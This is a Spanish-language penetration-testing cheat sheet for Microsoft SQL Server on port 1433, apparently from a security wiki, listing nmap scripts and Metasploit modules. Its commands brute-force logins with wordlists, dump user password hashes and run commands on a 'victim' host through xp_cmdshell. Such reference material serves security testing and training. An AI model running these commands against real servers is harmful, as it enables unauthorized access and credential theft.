MSSQL (1433)

MSSQL, o Microsoft SQL Server, es un sistema de gestión de bases de datos relacional desarrollado por Microsoft. Es utilizado para almacenar y recuperar datos según las necesidades de diferentes aplicaciones, desde pequeñas a grandes empresas. MSSQL ofrece características avanzadas como soporte para transacciones, integridad referencial, seguridad robusta y herramientas de administración y desarrollo. Es conocido por su integración estrecha con otros productos de Microsoft, como .NET Framework y Azure, y utiliza T-SQL (Transact-SQL) como su lenguaje de consulta.

Nmap

Scripts de nmap utiles para este servicio:

  • ms-sql-info

  • ms-sql-ntlm-info

  • ms-sql-brute

  • ms-sql-empty-password

  • ms-sql-query

  • ms-sql-dump-hashes

  • ms-sql-xp-cmdshell

nmap --script ms-sql-info -p 1433 192.168.1.10

Comprobar autenticación NTLM

nmap --script ms-sql-ntlm-info --script-args mssql.instance-port 1433 192.168.1.10

Enumerar usuarios y contraseña validos para MSSQL

nmap -p 1433 --script ms-sql-brute -script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 192.168.1.10

Comprobar si el usuario "sa" tiene configurada la contraseña como vacia

nmap -p 1433 --script ms-sql-empty-password 192.168.1.10

Extraer todos los usuarios con sesión con una consulta sql

nmap -p 1433 --script ms-sql-query --script-args mssql.username=<USER>,mssql.password=<PASSWORD>,ms-sql-query="SELECT * FROM master..syslogins" 192.168.1.10 -oN output.txt

Extraer todos los hashes de los usuarios

nmap -p 1433 --script ms-sql-dump-hashes --script-args mssql.username=<USER>,mssql.password=<PASSWORD> 192.168.1.10

Ejecutar un comando en la máquina victima usando xp_cmdshell

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=<USER>,mssql.password=<PASSWORD>,ms-sql-xp-cmdshell.cmd="type C:\flag.txt" 192.168.1.10

Metasploit

  • auxiliary/scanner/mssql/mssql_login

  • auxiliary/admin/mssql/mssql_enum

  • auxiliary/admin/mssql/mssql_enum_sql_logins

  • auxiliary/admin/mssql/mssql_exec

  • auxiliary/admin/mssql/mssql_enum_domain_accounts

AnteriorMySQL (3306)SiguienteReconocimiento

Última actualización